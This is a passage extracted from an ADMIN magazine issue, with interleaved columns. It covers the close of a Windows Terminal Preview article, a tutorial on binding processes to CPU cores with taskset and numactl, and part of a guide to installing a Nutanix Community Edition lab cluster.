tion of the FancyZones editor from any, toCurrent, and onCurrent op- Command Prompt Properties or Win-
Microsoft. tions. Use of the any option means dows PowerShell Properties in the
As a prerequisite for the Quake win- that the shortcut changes to the menu. When you get there, you will
dow, an instance of the Windows Ter- desktop on which the terminal win- find a new Terminal tab where you
minal must be running. In this context, dow is open; the toCurrent option can configure the terminal colors and
the setting to start Windows Terminal moves the terminal window to the cursor shape.
with the user’s login is very practical. current desktop, no matter which If your Windows version is not up to
The current Stable version already desktop it is on right now; and date, you will see an empty space in

44 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Windows Terminal Preview TO O L S

the lower right corner (the red frame version is up to date, you can config- Info
in Figure 2 shows the space for the ure Windows Terminal Preview as the [1] Windows Terminal Preview in Microsoft
setting option). If your Windows default shell. Store: [https://www.microsoft.com/
en-us/p/windows-terminal-preview/
Conclusions 9n8g5rfz9xk3]
[2] Windows Terminal Preview on GitHub:
The command prompt in the form of [https://github.com/microsoft/terminal/
the terminal is far from dead and is releases]
under active development. In Win- [3] More information on Windows Terminal:
dows Terminal, Microsoft has created [https://docs.microsoft.com/en-us/
a state-of-the-art command prompt windows/terminal/]
with a wide range of configuration
options. The additional integration The Author
of PowerShell, Windows Subsystem Rainer W. Gerling is a theoretical physicist and a
for Linux, and Azure Cloud Shell is a data privacy and IT security expert. He has been
success. The customization options professionally involved in information technology
leave little to be desired. It is evident for more than 40 years, and in 1986 he published
that Microsoft is looking to encourage one of the first articles in Germany on computer
professional users who prefer to use viruses. From 1993 until his retirement in 2020,
Linux to bind more strongly to Win- he was the data privacy officer and CISO of the
Figure 2: Although the current Windows dows. The complete documentation Max-Planck-Gesellschaft (Max Planck Society).
11 already has an option to set the default for Windows Terminal (Preview) can Today he teaches Information Security at the
shell, it is still missing in Windows 10. be found online [3]. Q Munich University of Applied Sciences.
TO O L S Processor Affinity Tools

CPU affinity in OpenMP and MPI applications

Bindings
Get better performance from your nodes by binding processes and associating memory to specific cores. Jeff Layton
It’s called high-performance want the best performance from the to another. In my experience, when
computing (HPC), not low- interconnect between processing running serial code, it only stays on a
performance computing (LPC), not elements, the interconnect among particular core for a few seconds be-
medium-performance computing processing and memory elements fore being moved to another core.
(MPC), and not even really awful- and accelerators, and the intercon- When a process move takes place, the
performance computing (RAPC). The nect among the processors and accel- application is “paused” while its state
focus is doing everything possible to erators to external networks. Under- moves from one processor to another,
get the highest performance possible standing how these components are which takes time and slows the ap-
for your applications. connected is a key step for improving plication. After the process is moved,
Needless to say, but I will say it any- application performance. it could be accessing memory from
way, processors and systems have got- Compounding the challenge of find- another part of the system that re-
ten very complicated. Individual CPUs ing the hardware path for best per- quires traversing a number of internal
can have 64+ cores, and this number formance is the operating system. interconnects, reducing the memory
is growing. They are being packaged Periodically, the operating system runs bandwidth, increasing the latency,
in different ways, including multichip services, and sometimes the kernel and negatively affecting performance.
modules [1] with memory controllers scheduler will move running pro- Remember, it’s not LPC, it’s HPC.
connected in various locations, multi- cesses from a particular process to an- Fortunately, Linux has developed a
ple memory channels, multiple caches other as a result. Then your carefully set of tools and techniques for “pin-
sometimes shared across cores, chip planned hardware path can be dis- ning” or “binding” processes to spe-
and module interconnections, network rupted, resulting in poor performance. cific cores while associating memory
connections, Peripheral Component I have run all types of code on my to these cores. With these tools, you
Interconnect Express (PCIe) switches, workstation and various clusters, can tell Linux to run your process on
and more. These elements are con- including serial, OpenMP, OpenACC, very specific cores or limit the move-
nected in various ways, resulting in a and MPI code. I carefully watch the ment of the processes, as well as
complex non-uniform memory access load on each core with GkrellM [3], control where memory is allocated for
Lead Image © podfoto, 123RF.com

(NUMA) [2] architecture. and I can see the scheduler move pro- these cores.
To get the best possible perfor- cesses from one core to another. Even In this article, I present tools you can
mance, you want the best band- when I leave one to two cores free use for binding processes. In "Proces-
width and least latency between the for system processes, with the hope sor Affinity for OpenMP and MPI" (on-
processing elements and between that processes won’t be moved, I still line) [4], I show how they can be used
the memory and processors. You see the processes move from one core with OpenMP and MPI applications.

46 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Processor Affinity Tools TO O L S

Example Architecture Listing 1: lscpu

$ lscpu
I’ll use a simple example of a single-
Architecture: x86_64
socket system with an AMD Ryzen CPU op-mode(s): 32-bit, 64-bit
Threadripper [5] 3970X CPU that has Byte Order: Little Endian
simultaneous multithreading (SMT) Address sizes: 43 bits physical, 48 bits virtual
turned on. CPU(s): 64
On-line CPU(s) list: 0-63
A first step in understanding how the
Thread(s) per core: 2
processors are configured is to use the Core(s) per socket: 32
command lscpu. The output of the Socket(s): 1
command on the example system is NUMA node(s): 1
shown in Listing 1. The output notes Vendor ID: AuthenticAMD
CPU family: 23
64 CPUs and two threads per CPU,
Model: 49
which indicates that SMT is turned Model name: AMD Ryzen Threadripper 3970X 32-Core Processor
on, which means 32 “real” cores and Stepping: 0
32 SMT cores. Frequency boost: enabled
Also note the single socket and one CPU MHz: 2198.266
NUMA node. The output also lists CPU max MHz: 3700.0000
CPU min MHz: 2200.0000
the L1d cache as 1MiB, the L1i cache
BogoMIPS: 7400.61
as 1MiB, the L2 cache as 16MiB, and Virtualization: AMD-V
the L3 cache as 128MiB. However, it L1d cache: 1 MiB
doesn’t tell you how the caches are L1i cache: 1 MiB
associated with cores. L2 cache: 16 MiB
L3 cache: 128 MiB
One way to get most of this informa-
NUMA node0 CPU(s): 0-63
tion in a more compact form is shown Vulnerability Itlb multihit: Not affected
in Listing 2. Vulnerability L1tf: Not affected
An important question to be an- Vulnerability Mds: Not affected
swered is: Which cores are “real,” Vulnerability Meltdown: Not affected
Vulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp
and which cores are SMT? One way
Vulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization
is to look at the /sys filesystem for Vulnerability Spectre v2: Mitigation; Full AMD retpoline, IBPB conditional, STIBP conditional,
the CPUs: RSB filling
Vulnerability Srbds: Not affected
-----------text01 code Vulnerability Tsx async abort: Not affected
$ cat /sys/devices/system/cpu/cpu0/U Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat
pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb
topology/thread_siblings_list
rdtscp lm constant_tsc rep_good nopl nonstop_ts
0,32 c cpuid extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16
sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_
If the first number in the output [6] is legacy svm extapic cr8_legacy abm sse4a misalignss
equal to the CPU number in the com- e 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_
nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate sme ssbd mba
mand, then it’s a real core. If not, it
sev ibpb stibp vmmcall fsgsbase bmi1 avx2 sme
is an SMT core. For the example com- p bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt
mand, the CPU number in the com- xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_
mand is 0 and the first number is also local clzero irperf xsaveerptr wbnoinvd arat npt lbr
0. This makes it a real core. v svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists
pausefilter pfthreshold avic v_vmsave_vmload vgif umip rdpid overflow_
Now try the command on a few other
recov succor smca
CPUs (Listing 3). The first command

Listing 2: Compact lscpu Listing 3: Real or SMT? Method 1

$ cat /sys/devices/system/cpu/cpu1/topology/thread_siblings_list
$ lscpu | egrep 'Model name|Socket|Thread|NUMA|CPU\(s\)' 1,33
CPU(s): 64 $ cat /sys/devices/system/cpu/cpu30/topology/thread_siblings_list
On-line CPU(s) list: 0-63 30,62
Thread(s) per core: 2 $ cat /sys/devices/system/cpu/cpu31/topology/thread_siblings_list
Socket(s): 1 31,63
NUMA node(s): 1 $ cat /sys/devices/system/cpu/cpu32/topology/thread_siblings_list
Model name: AMD Ryzen Threadripper 3970X 32-Core Processor 0,32
NUMA node0 CPU(s): 0-63 $ cat /sys/devices/system/cpu/cpu33/topology/thread_siblings_list
1,33

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 47
 TO O L S Processor Affinity Tools

looks at CPU 1, and it’s a real core number in the output is 0. Because 0 cache of 512KB, an L1d (data) cache
(the CPU number is 1, and the first does not match 32, it is an SMT core. of 32KB, and a L1i (instruction) cache
number in the output is 1, which The same is also true on CPU 33. of 32KB.
matches). CPU 30 and 31 are also You can also use the first number in The eight L3 cache “groups” make a
both real cores. However, when the the output for the SMT cores as the total of 64 cores with SMT turned on.
command is run on CPU 32, the first real core with which it is associated.
For example, CPU 32 is associated Affinity Tools
Listing 4: Real or SMT? Method 2 with CPU 0 (the first number in the
$ cat $(find /sys/devices/system/cpu -regex output). So CPU 0 is the real core and In this article, I discuss two Linux
".*cpu[0-9]+/topology/thread_siblings_list") | sort CPU 32 is the SMT core in the pair. tools that allow you to set and control
-n | uniq Understanding the numbering of the application threads (processes), giv-
0,32 real and SMT cores is important, ing you great flexibility to achieve the
1,33 but you have another way to check performance you want. For example,
2,34 whether the CPU is real or SMT. a great many applications need mem-
3,35
Again, it involves examining the /sys ory bandwidth. The tools allow you
4,36
filesystem (Listing 4). The output to make sure that each thread gets the
5,37
from the command is in pairs, listing largest amount of memory bandwidth
6,38
7,39
the real CPU number first and the as- possible.
8,40 sociated SMT CPU number last. The If network performance is critical
9,41 first line of the output says that CPU to application performance (think
10,42 0 is the real core and CPU 32 is the MPI applications), with these tools,
11,43 SMT CPU. Really it’s the same as the you can bind threads to cores that
12,44 previous command, except it lists all are close to a network interface card
13,45 of the cores at once. (NIC), perhaps not crossing a PCIe
14,46 The lstopo tool can give you a visual switch. Alternatively, you can bind
15,47
layout of the hardware along with a processes to cores that are as close
16,48
more detailed view of the cache lay- as possible to accelerators to get the
17,49
out (Figure 1). This very useful com- maximum possible PCIe bandwidth.
18,50
19,51
mand returns the hardware layout of The Linux tools presented here allow
20,52 your system. Although it can include you to bind processes and memory to
21,53 PCIe connections as well, I’ve chosen cores; you have to find the best way
22,54 not to display that output. to use these tools for the best possible
23,55 Notice in the figure that each 16MB application performance.
24,56 L3 cache has four groups of two
25,57 cores. The first core in each pair is
26,58
taskset
the real core and the second is the
27,59
SMT core. For example, Core L#0 has The taskset command [7] is consid-
28,60
two processing units (PUs), where PU ered the most portable Linux way
29,61
L#0 is a real core listed as P#0 and PU of setting or retrieving the CPU af-
30,62
31,63
L#1 is the SMT core listed as P#32. finity (binding) of a running process
Each group of two cores has an L2 (thread). According to the taskset man

Figure 1: lstopo output for sample systems.

48 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Processor Affinity Tools TO O L S

page, “The Linux scheduler will honor particularly in relation to where mem- free to move the processes to CPUs as
the given CPU affinity and the process ory is allocated, for which it has sev- long as the policy is met.
will not run on any other CPUs.” eral “policies” that are implemented
An example of executing a process as options to the command: Q The --physcpubind=<CPUs> policy
with the taskset command is: executes the process(es) on the list
Q The --interleave=<nodes> policy of CPUs provided:
-------text02 has the application allocate mem-
$ taskset --cpu_list 0,2 application.exe ory in a round-robin fashion on -----------text07
“nodes.” With only two NUMA $ numactl --physcpubind=+0-4,8-12 U
This command sets the affinity of ap- nodes, this means memory will be application.exe
plication.exe to cores 0 and 2 and then allocated first on node 0, followed
executes it. You can also use the short by node 1, node 0, node 1, and so You can also say all, and it will use
version of the --cpu_list option, -c. on. If the memory allocation can- all of the CPUs. This policy runs ap-
If you want to change the affinity of not work on the current interleave plication.exe on CPUs 0-4 and 8-12.
a running process, you need to get target node (node x), it falls back to
the process ID (PID) of the processes other nodes but in the same round- Q The --localalloc policy forces al-
with the --pid (-p) option. For exam- robin fashion. You can control location of memory on the current
ple, if you have an application with which nodes are used for memory node:
four processes (or four individual interleaving or use them all:
processes), you get the PIDs of each -----------text08
process and then run the following -----------text04 $ numactl --physcpubind=+0-4,8-12 U
command to move them to cores 10, $ numactl --interleave=all U --localalloc application.exe
12, 14, and 16: application.exe
This policy runs application.exe on
----------text03 This example command interleaves CPUs 0-4 and 8-12, while allocating
$ taskset --pid --cpu_list 10 [pid1] memory allocation on all nodes for memory on the current node.
$ taskset --pid --cpu_list 12 [pid2] application.exe. Note that the sample
$ taskset --pid --cpu_list 14 [pid3] system in this article has only one Q The --preferred=<node> policy
$ taskset --pid --cpu_list 16 [pid4] node, node 0, so all memory alloca- causes memory allocation on the
tion uses it. node you specify, but if it can’t,
numactl it will fall back to using memory
Q The --membind=<nodes> policy from other nodes. To set the pre-
One key tool for pinning processes forces memory to be allocated ferred node for memory allocation
is numactl [8], which can be used from the list of provided nodes (in- to node 1, use:
to control the NUMA policy for cluding the all option):
processes, shared memory, or both. ----------------text09
One key thing about numactl is that, -----------text05 $ numactl --physcpubind=+0-4,8-12 U
unlike taskset, you can’t use it to $ numactl --membind=0,1 application.exe --preferred=1 application.exe
change the policy of a running ap-
plication. However, you can use it This policy causes application.exe to This policy can be useful if you want
to display information about your use memory from node 0 and node to keep application.exe running, even
NUMA hardware and the current 1. Note that a memory allocation can if no more memory is available on the
policy (Listing 5). Note for this sys- fail if no more memory is available on current node.
tem, SMT is turned on, so the output the specified node.
shows 64 CPUs. Listing 5: numactl
The system has one NUMA node Q The cpunodebind=<nodes> option $ numactl --hardware
(available: 1 nodes), and all 64 cores causes processes to run only on available: 1 nodes (0)
are associated with that NUMA node. the CPUs of the specified node(s): node 0 cpus: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
Because there is only NUMA node, 18 19 20 21 22 23 24 25 26 27 28 29 30 31
the node distances from NUMA node -----------text06 32 33 34 35 36 37 38 39 40 41 42 43 44 45
0 to NUMA node 0 is listed as 10, $ numactl --cpunodebind=0 U 46 47 48 49 50 51 52 53 54 55 56 57 58 59
which indicates it’s the same NUMA --membind=0,1 application.exe 60 61 62 63
node 0 size: 64251 MB
node. The output from the command
node 0 free: 60218 MB
also indicates it has 64GB of memory This policy runs application.exe on
node distances:
(node 0 size: 64251 MB). the CPUs associated with node 0 and
node 0
The advantages of numactl come from allocates memory on node 0 and node 0: 10
its ability to place and bind processes, 1. Note that the Linux scheduler is

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 49
 TO O L S Processor Affinity Tools

Listing 6: numactl --show To show the NUMA policy setting for NUMA node is the current one (this
$ numactl --show
the current process, use the --show system only has one node). It then
policy: default (-s) option: lists the physical cores (physcpubind)
preferred node: current that are associated with the current
physcpubind: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ numactl --show node, the bound CPU cores (node 0),
19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 and to which node memory allocation
34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 Running this command on the sam- is bound (again, node 0).
49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 ple system produces the output in The next examples show some
cpubind: 0 Listing 6. numactl options that define com-
nodebind: 0
The output is fairly self-explanatory. monly used policies. The first ex-
membind: 0
The policy is default. The preferred ample focuses on running a serial

Figure 2: Output of TACC show_affinity tool (used with permission from the GitHub repository owner).

50 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Processor Affinity Tools TO O L S

application – in particular, running monitoring tool, show_affinity [9], with specific directions on where
the application on CPU 2 (a non-SMT comes from the Texas Advanced Com- to allocate memory. In this way,
core) and allocating memory locally: puting Center (TACC). you can prevent the kernel process
The tool shows “… the core binding scheduler from moving the processes
-----------text10 affinity of running processes/threads or at least control where the sched-
$ numactl --physcpubind=2 --localalloc of the current user.” The GitHub uler can move them. If you under-
application.exe site has a simple, but long, output stand how the systems are laid out,
example from running the command you can use these tools to get the
The kernel scheduler will not move (Figure 2). best possible performance from your
application.exe from core 2 and will application(s).
allocate memory using the local node Summary In this article, I briefly introduced two
(node 0 for the sample system). tools along with some very simple
To give the kernel scheduler a bit Today’s HPC nodes are complicated, examples of how you might use them,
more freedom, yet keep memory al- with huge core counts, distributed primarily on serial applications. Q
location local to provide the oppor- caches, various memory connections,
tunity for maximum memory band- PCIe switches with connections to ac-
width, use: celerators, and NICs, making it diffi- Info
cult to clearly understand where your [1] Multichip Modules: [https://en.wikipedia.
-----------text11 processes are running and how they org/wiki/Multi-chip_module]
$ numactl --cpunodebind=0 --membind=0 are interacting with the operating sys- [2] Non-Uniform Memory Access (NUMA):
application.exe tem. This understanding is extremely [https://en.wikipedia.org/wiki/
critical to getting the best possible Non-uniform_memory_access]
The kernel scheduler can move the performance, so you have HPC and [3] GkrellM: [http://gkrellm.srcbox.net/]
process to CPU cores associated with not RAPC. [4] "Processor Affinity for OpenMP and MPI"
node 0 while allocating memory on If you don’t pay attention to where by Jeff Layton: [https://www.admin-maga-
node 0. This policy helps the kernel your code is running, the Linux zine.com/HPC/Articles/Processor-Affinity-
adjust processes as it needs, without process scheduler will move them for-OpenMP-and-MPI]
sacrificing memory performance around, introducing latency and re- [5] AMD Ryzen Threadripper:
too much. Personally, I find the ker- ducing performance. The scheduler [https://www.amd.com/en/products/cpu/
nel scheduler tends to move things can move processes into non-optimal amd-ryzen-threadripper-3970x]
around quite often, so I like binding situations, where memory is used [6] First number in the output: [https://
my serial application to a specific from a different part of the system, stackoverflow.com/questions/7274585/
core; then, the scheduler can put resulting in much-reduced memory linux-find-out-hyper-threaded-core-id]
processes on other cores as needed, bandwidth. It can also cause pro- [7] Taskset command: [https://man7.org/linux/
eliminating any latency in moving the cesses to communicate with NICs man-pages/man1/taskset.1.html]
processes around. across PCIe switches and internal [8] numactl:
system connections, again resulting in [https://linux.die.net/man/8/numactl]
Tool for Monitoring CPU increased latency and reduced band- [9] show_affinity:
width. This is also true for accelera- [https://github.com/TACC/show_affinity]
Affinity tors communicating with each other,
Both taskset and numactl allow you to with NICs, and with CPUs. The Author
check on any core or memory bind- Fortunately, Linux provides a couple Jeff Layton has been in the HPC business for al-
ings. However, sometimes they aren’t of tools that allow you to pin (also most 25 years (starting when he was 4 years old).
enough, which creates an opportu- called binding or setting the affinity He can be found lounging around at a nearby Frys
nity for new tools. A good affinity of) processes to specific cores along enjoying the coffee and waiting for sales.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 51
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Nutanix Community Edition

Clustering with the Nutanix Community Edition

The Right Track

The free Community Edition of the Nutanix hyperconverged infrastructure, Nutanix on-premises cloud, is offered
alongside its commercial product for those looking to take their first steps in the environment. By Günter Baumgart

To be clear, the Community Edition you cannot manage a Community then not be able to use the Nutanix
of Nutanix was developed for testing Edition cluster with Prism Central Flow microsegmentation functionality
purposes only; it is not a replacement from the production version. Con- because it can only be used in con-
for the production version. The Com- versely, you cannot use Prism Central junction with AHV.
munity Edition does not give you all Community Edition to manage a pro-
the possibilities that you have with duction cluster. Everything’s Connected
the commercial version. For example, If you want to use VMware’s ESXi in
the Community Edition only supports the Community Edition as your hy- During the installation and subse-
two hypervisors: Acropolis (AHV) by pervisor, also remember that you will quent testing of the Community
Nutanix and ESXi by VMware. The
basic setup of a private enterprise
cloud from Nutanix built on the Com-
munity Edition includes the hypervi-
sor, the Controller Virtual Machine
(CVM) and associated cloud manage-
ment system, the Prism element for
single-cluster management, and Prism
Central for higher level multicluster
management (Figure 1).
With the Community Edition, you
can set up a one-, three-, or four-node
cluster. All other conceivable cluster
combinations are reserved exclusively
for the commercial version. The indi-
Photo by Beau Runsten on Unsplash

vidual components of the Community

Edition, such as AHV; the AOS cloud
operating system, which is based on
the individual CVMs in the cluster;
and the cloud management system,
cannot be mixed with components
of the production version. Therefore, Figure 1: A schematic representation of the components of the management environment.

52 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Nutanix Community Edition CO N TA I N E R S A N D V I RT UA L I Z AT I O N

Edition, it can be quite useful to On the Nutanix Community Portal your Nutanix Lab cluster, you also
switch to the command line from site you will see the Download Nuta- need the image of the vSphere hyper-
time to time. To do this, you need to nix Community Edition block. After visor (ESXi ISO).
know how to find your way around clicking on this, the Community Edi- If you want to install and set up
the network and which module and tion download site pops up immedi- Prism Central after your cluster has
service you can reach. Regardless ately, and you are treated to an initial been installed and configured, you
of whether you are using AHV or overview of the binaries available to need the matching binary (i.e., the
ESXi, you always have at least two you there. At press time, version CE- Prism Central Deployment file) in
networks: an internal network that is 2020.09.16 was available. Because a the form of a TAR archive and the
not connected to a physical network new production version was recently Metadata for AOS upgrade and PC
adapter and an external network to released (AOS LTS 5.20 and AOS STS deploy/upgrade file as a ZIP file. In
which the existing physical adapters 6.0), it can be assumed that a new addition to the JSON files for up-
are connected. The internal network Community version will soon follow. grades, the latter also contains the
is used to support communication To install the Community Edition ce-pc-deploy-202y.mm.dd-metadata.
between the CVM and the hypervisor. (CE), you need to download the cor- json file, which you need to install
The 192.168.5.0 network is used for responding ISO file (CE-202y.mm.dd. Prism Central.
this purpose. iso). You can use this image to install Next, download the VirtIO drivers
The hypervisor always has the IP the CVM and AHV on your nodes in a and, if you want to try out End User
address 192.168.5.1 and the CVM fully automated process. If you would Computing (EUC) or Virtual Desktops
the IP address 192.168.5.2, which rather use ESXi as the hypervisor in (VDIs) on the Community Edition,
means the installation process al-
ways creates two virtual bridges or
virtual switches for each node in
the cluster. If you use AHV, you will
find vir br0 and br0 in the node,
which for ESXi are vSwitchNutanix
and vSwitch0.
You assign external IP addresses to
the CVM and the hypervisor dur-
ing the install. If you now want to
access the console of the AHV, you
can either address it on the external
network or the internal network.
The same applies to the console of
the CVM: You can access the CVM
console from the external or internal
network (Figure 2).
Table 1 provides an overview of the
accounts you can use to access the
system, including the root login name
for accessing the console on the hy-
pervisor and the nutanix login name
for the CVM console, along with
the matching password nutanix/4u,
which you also need to log on to the
respective consoles.
Figure 2: Different approaches lead to the CVM and hypervisor consoles.
Installation Media
In the first step, you need to create an Table 1: Nutanix Usernames
account with Nutanix [1] and register Component Protocol Password Username
your email address by following the Controller VM SSH nutanix nutanix/4u
Get Access Today! link. After you have AHV SSH root nutanix/4u
completed the registration process,
ESXi SSH root nutanix/4u
you have a personal Nutanix account
Prism Element HTTPS (port 9440) admin nutanix/4u
and are now authorized to log in to
the portal [2]. Prism Central HTTPS (port 9440) admin nutanix/4u

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 53
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Nutanix Community Edition

the matching plugins. In the Docu- 32GB DDR4-2666 SO-DIMMs (i.e., a virtual disk with a capacity of 32GB
mentation and Guides section on this total of 64GB of RAM). The computer as the installation target for the VM.
site you will also find bundles of ad- has two disk drives – one 512GB and
ditional documentation on the Com- one 1TB SSD – and an eighth genera- Setting up a Local Nutanix
munity Edition in the form of PDFs tion quad-core Intel Core i7 8559U
and video files. processor running at 2.7GHz. There-
Cloud
fore, the machine is not totally up-to- After the preparatory work is done,
Installation Preparation date but is still perfectly adequate for you can move on to installing the
the lab. If you do not have a machine Community Edition on the Intel NUC.
You have now downloaded all the like this at hand for your installation, Insert the two USB sticks into the cor-
software you need. The question that use something with similar hardware, responding server ports and switch
remains is how to install the Com- or if you are going for a nested setup the server on. You can now follow the
munity Edition: physically or virtually in your lab, use something with simi- installation process on the monitor
(i.e., in a nested setup)? You also need lar specs for the VM. connected to the NUC and, depending
to decide whether you want a one-, To avoid wasting time while install- on the type of hardware you are using
three-, or four-node cluster. No matter ing your lab setup, you should have in your lab, the Nutanix Community
what you ultimately decide, the instal- all the necessary information ready Edition Installer configuration front
lation procedure is always the same. In in advance: a DNS server, a default end appears, sooner or later, where
the first iteration I take a look at creat- gateway, at least two Network Time you set up your Nutanix one-node
ing a one-node cluster lab based on Protocol (NTP) servers, and – if you cluster.
the Community Edition with Nutanix want to connect your lab to Active First, select the hypervisor you want
AHV as the hypervisor, Prism Central Directory – access credentials. You to use in your cluster. If you go for
for multicluster management, and an also need an IP address from your lab Nutanix AHV (Figure 4, step 1),
Intel NUC (Next Unit of Computing, a network for the CVM, another for the you can continue directly with the
small-form-factor barebone computer) one-node-cluster itself, one in case disk assignments (Figure 4, step 2)
mini-PC as the hardware platform. you want to provide an iSCSI target because AHV is an integral part of
The NUC used in our lab is the NUC8 with Nutanix volumes, another IP ad- the CE image. If you decide to use
i7 BEH model. It comes with two dress (for the hypervisor, of course), ESXi as your hypervisor, you need to
and yet another IP address for Prism provide your ESXi installation image
IP Addresses for Larger Clusters Central. (See the “IP Addresses for over HTTP (e.g., in the form http://
If you are more interested in installing a Larger Clusters” box.) Additionally, <webserver>/iso/esxi.iso). Because
three- or four-node cluster, remember that you need unique names for the Nuta- I am using AHV as the hypervisor for
you will need separate IP addresses for each nix cluster and for Prism Central. this workshop, I check AHV in the
selection box in step 1.
individual hypervisor and CVM that resides
Creating a USB Installation You can now see all the storage de-
on your cluster’s nodes.
vices found on the server. As you
Stick can see, sdd was selected as the USB
To install the server, you need two installation target for the hypervisor,
USB sticks. One USB stick is used and the CVM will be installed on
for the installation, and the second sda. In the fields selected in step 3,
is used as an installation target or you now need to assign the address
boot device. As far as the capacity of data for the hypervisor’s external
the sticks is concerned, 32GB will do network. In step 4, you can enter
nicely. To create a bootable USB stick, the external address data for the
you can use the USB installer of your controller virtual machine (VM), and
choice (e.g., Rufus [3]). in step 5, you are given the option
Now take the downloaded of having the cluster created auto-
ce-2020.09.16.iso file and create a matically by the installation process.
bootable USB CE installation stick This step is fine if you want to cre-
with one of the two USB sticks (Fig- ate a one-node cluster, but if you
ure 3). If you plan to install the Com- want to create a three-node cluster,
munity Edition nested, this step is for example, it might make more
not necessary, of course, because you sense to create the cluster manually
can mount the CE image directly on after successfully completing the in-
the virtual hardware. The second USB stallation of all the nodes by typing
Figure 3: Generate a USB CE installation stick would not be necessary either the following on the command line
device with the ce-2020.09.16.iso file. because you can simply add another of a controller VM:

54 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Nutanix Community Edition CO N TA I N E R S A N D V I RT UA L I Z AT I O N

Success message in the output, log

on to the Prism Element UI process
of the CVM on https://<IP address
of the CVM>:9440/. For the first
login, use the admin account with
the nutanix/4u password. The user
interface now expects you to enter
a new password. After doing so, log
on again with the new password. In
the next step, Prism Element then ex-
pects the NEXT account to be set up.
The Prism Element splash page then
appears.
Now click on the cogwheel (Settings)
at the top in the right-hand corner
of the user interface (UI) and select
Network Configuration | Create Net-
work to create a new network. I used
vlan.0 for the network name and 0 as
the VLAN ID.
Figure 4: Entering the parameters for the cluster configuration. You could now start installing your
VMs on the platform. A short live
cluster -s <cvm_ip-1>, <cvm_ip-2>, U can proceed to create the cluster. demo introducing Prism Element can
<cvm_ip-3> [--redundancy_factor=2] U Because the option Create single- be found online [4]. For now, you
create node cluster? was not selected for should do some fine tuning such as
this installation, this is the next and assigning cluster names, cluster IP
You do not need to start the cluster final step after the restart. addresses, and the IP address for the
when you are creating a new clus- To use SSH to connect to the CVM iSCSI target Nutanix-Volumes. You
ter; the cluster starts up automati- and create the cluster, enter: can also do all of this at the com-
cally after creation. However, the mand line (Table 2). More commands
reason you should not rely on this ssh nutanix@<IP address of CVM> and scripts are located online [5], or
automation, but build the cluster cluster -s <cvm_ip> create simply enter ncli or acli at the com-
retroactively, is that if the instal- mand line of the CVM and press the
lation of just one node fails for You have to wait until the system has Tab key to delve more deeply into the
some reason, you need to create created the cluster and started up all individual command references.
the whole cluster again, and this is the services. Again, some patience is Next, click on the Unnamed item in
overhead you would like to avoid. required. To check the progress, type: the UI (Figure 5) and enter a name
Once you have completed the en- for your cluster and the correspond-
tries and set up everything, click cluster status ing IP addresses in the individual
Next to be taken to the End User Li- fields of the form. Once that’s done,
cence Agreement (EULA). After ac- After all cluster processes have you can explore and use your cloud
cepting the terms of use, press Start started up and you have seen a in your lab.
and the installation begins. You can
now follow the entire installation Table 2: Useful Commands
process onscreen from the console Function Command
output. My entire installation and Start the cluster cluster start
the subsequent startup of the ser- Stop the cluster cluster stop
vice took a good 30 minutes with
Delete the cluster cluster destroy
the hardware used in this example,
which is actually quite quick if you Display the cluster status cluster status
consider that you are installing and Create a one-node cluster cluster -s <CVM_IP_adress> create
configuring the complete Nutanix Enter a DNS server cluster -dns_servers=<DNS-IP-1>, <DNS-IP-2> create
CE one-node hyperconverged infra- cluster -ntp_servers=<NTP_server> create
Enter an NTP server
structure (HCI). Now remove the
Define the cluster name cluster -cluster_name=<cluster_name> create
USB installation stick when the sys-
tem prompts you to do so, and press Assign the cluster IP cluster -cluster_external_ip=<cluster_IP_address>
address create
Y at the console to reboot, and you

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 55
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Nutanix Community Edition

Prism Central and Other steps. To begin, log on to the Prism to the Prism Element: It’s exactly
Element UI. Top left in the browser the same procedure here. Now move
Features
you will then see a box labeled Prism on to the CE Cluster registration in
Now that you have reached this point Central. To open a form where you Prism Central by going to your Prism
of your installation, you have your can upload the Prism Central binaries Element (https://<IP address of
first Nutanix test cluster. The creators ce-pc-deploy-2020.09.16-metadata. CVM>:9440), clicking on Register or
of the Community Edition promise json and ce-pc-deploy-2020.09.16.tar create new, and selecting Connect.
that new improvements are continu- that you previously downloaded from Here, you enter the IP address, login
ally being incorporated into the test the CE Community site, click on Reg- name, and password of Prism Central
platform. You can check out its prog- ister or create new. and click on Connect; hey, presto, the
ress by updating the system through After the upload completes, click cluster is registered (Figure 6).
